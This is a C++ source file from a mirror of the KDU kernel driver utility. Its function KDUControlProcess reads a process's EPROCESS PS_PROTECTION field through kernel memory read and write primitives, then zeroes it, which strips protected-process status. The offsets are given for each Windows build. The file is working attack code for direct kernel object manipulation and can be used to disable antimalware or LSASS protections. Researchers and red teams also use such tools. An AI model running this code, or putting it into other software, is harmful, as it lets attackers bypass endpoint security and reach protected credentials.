Rooba
/
KDU
mirror of https://github.com/hfiref0x/KDU.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity
KDU/Source/Hamakaze/ps.cpp

231 lines
6.5 KiB
C++
Raw Normal View History

Initial commit
2020-02-02 05:24:50 +00:00
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018 - 2020
*
* TITLE: PS.CPP
*
* VERSION: 1.00
*
* DATE: 24 Jan 2020
*
* Processes DKOM related routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
LPSTR KDUGetProtectionTypeAsString(
_In_ ULONG Type
)
{
LPSTR pStr;
switch (Type) {
case PsProtectedTypeNone:
pStr = (LPSTR)"PsProtectedTypeNone";
break;
case PsProtectedTypeProtectedLight:
pStr = (LPSTR)"PsProtectedTypeProtectedLight";
break;
case PsProtectedTypeProtected:
pStr = (LPSTR)"PsProtectedTypeProtected";
break;
default:
pStr = (LPSTR)"Unknown Type";
break;
}
return pStr;
}
LPSTR KDUGetProtectionSignerAsString(
_In_ ULONG Signer
)
{
LPSTR pStr;
switch (Signer) {
case PsProtectedSignerNone:
pStr = (LPSTR)"PsProtectedSignerNone";
break;
case PsProtectedSignerAuthenticode:
pStr = (LPSTR)"PsProtectedSignerAuthenticode";
break;
case PsProtectedSignerCodeGen:
pStr = (LPSTR)"PsProtectedSignerCodeGen";
break;
case PsProtectedSignerAntimalware:
pStr = (LPSTR)"PsProtectedSignerAntimalware";
break;
case PsProtectedSignerLsa:
pStr = (LPSTR)"PsProtectedSignerLsa";
break;
case PsProtectedSignerWindows:
pStr = (LPSTR)"PsProtectedSignerWindows";
break;
case PsProtectedSignerWinTcb:
pStr = (LPSTR)"PsProtectedSignerWinTcb";
break;
case PsProtectedSignerWinSystem:
pStr = (LPSTR)"PsProtectedSignerWinSystem";
break;
case PsProtectedSignerApp:
pStr = (LPSTR)"PsProtectedSignerApp";
break;
default:
pStr = (LPSTR)"Unknown Value";
break;
}
return pStr;
}
/*
* KDUControlProcess
*
* Purpose:
*
* Modify process object to remove PsProtectedProcess access restrictions.
*
*/
BOOL KDUControlProcess(
_In_ PKDU_CONTEXT Context,
_In_ ULONG_PTR ProcessId)
{
BOOL bResult = FALSE;
ULONG Buffer;
NTSTATUS ntStatus;
ULONG_PTR ProcessObject = 0, VirtualAddress = 0, Offset = 0;
HANDLE hProcess = NULL;
CLIENT_ID clientId;
OBJECT_ATTRIBUTES obja;
PS_PROTECTION* PsProtection;
printf_s("[>] Entering %s\r\n", __FUNCTION__);
InitializeObjectAttributes(&obja, NULL, 0, 0, 0);
clientId.UniqueProcess = (HANDLE)ProcessId;
clientId.UniqueThread = NULL;
ntStatus = NtOpenProcess(&hProcess, PROCESS_QUERY_LIMITED_INFORMATION,
&obja, &clientId);
if (NT_SUCCESS(ntStatus)) {
printf_s("[+] Process with PID %llu opened (PROCESS_QUERY_LIMITED_INFORMATION)\r\n", ProcessId);
supQueryObjectFromHandle(hProcess, &ProcessObject);
if (ProcessObject != 0) {
printf_s("[+] Process object (EPROCESS) found, 0x%llX\r\n", ProcessObject);
switch (Context->NtBuildNumber) {
case 9600:
Offset = PsProtectionOffset_9600;
break;
case 10240:
Offset = PsProtectionOffset_10240;
break;
case 10586:
Offset = PsProtectionOffset_10586;
break;
case 14393:
Offset = PsProtectionOffset_14393;
break;
case 15063:
case 16299:
case 17134:
case 17763:
case 18362:
case 18363:
Offset = PsProtectionOffset_15063;
break;
default:
Offset = PsProtectionOffset_19037;
break;
}
if (Offset == 0) {
printf_s("[!] Unsupported WinNT version\r\n");
}
else {
VirtualAddress = EPROCESS_TO_PROTECTION(ProcessObject, Offset);
printf_s("[+] EPROCESS->PS_PROTECTION, 0x%llX\r\n", VirtualAddress);
Buffer = 0;
if (KDUReadKernelVM(Context, VirtualAddress, &Buffer, sizeof(ULONG))) {
PsProtection = (PS_PROTECTION*)&Buffer;
LPSTR pStr;
printf_s("[+] Kernel memory read succeeded\r\n");
pStr = KDUGetProtectionTypeAsString(PsProtection->Type);
printf_s("\tPsProtection->Type: %lu (%s)\r\n",
PsProtection->Type,
pStr);
printf_s("\tPsProtection->Audit: %lu\r\n", PsProtection->Audit);
pStr = KDUGetProtectionSignerAsString(PsProtection->Signer);
printf_s("\tPsProtection->Signer: %lu (%s)\r\n",
PsProtection->Signer,
pStr);
PsProtection->Signer = PsProtectedSignerNone;
PsProtection->Type = PsProtectedTypeNone;
PsProtection->Audit = 0;
bResult = KDUWriteKernelVM(Context, VirtualAddress, &Buffer, sizeof(ULONG));
if (bResult) {
printf_s("[+] Process object modified\r\n");
pStr = KDUGetProtectionTypeAsString(PsProtection->Type);
printf_s("\tNew PsProtection->Type: %lu (%s)\r\n",
PsProtection->Type,
pStr);
pStr = KDUGetProtectionSignerAsString(PsProtection->Signer);
printf_s("\tNew PsProtection->Signer: %lu (%s)\r\n",
PsProtection->Signer,
pStr);
printf_s("\tNew PsProtection->Audit: %lu\r\n", PsProtection->Audit);
}
else {
printf_s("[!] Cannot modify process object\r\n");
}
}
else {
printf_s("[!] Cannot read kernel memory\r\n");
}
}
}
else {
printf_s("[!] Cannot query process object\r\n");
}
NtClose(hProcess);
}
else {
printf_s("[!] Cannot open target process, NTSTATUS (0x%lX)\r\n", ntStatus);
}
printf_s("[<] Leaving %s\r\n", __FUNCTION__);
return bResult;
}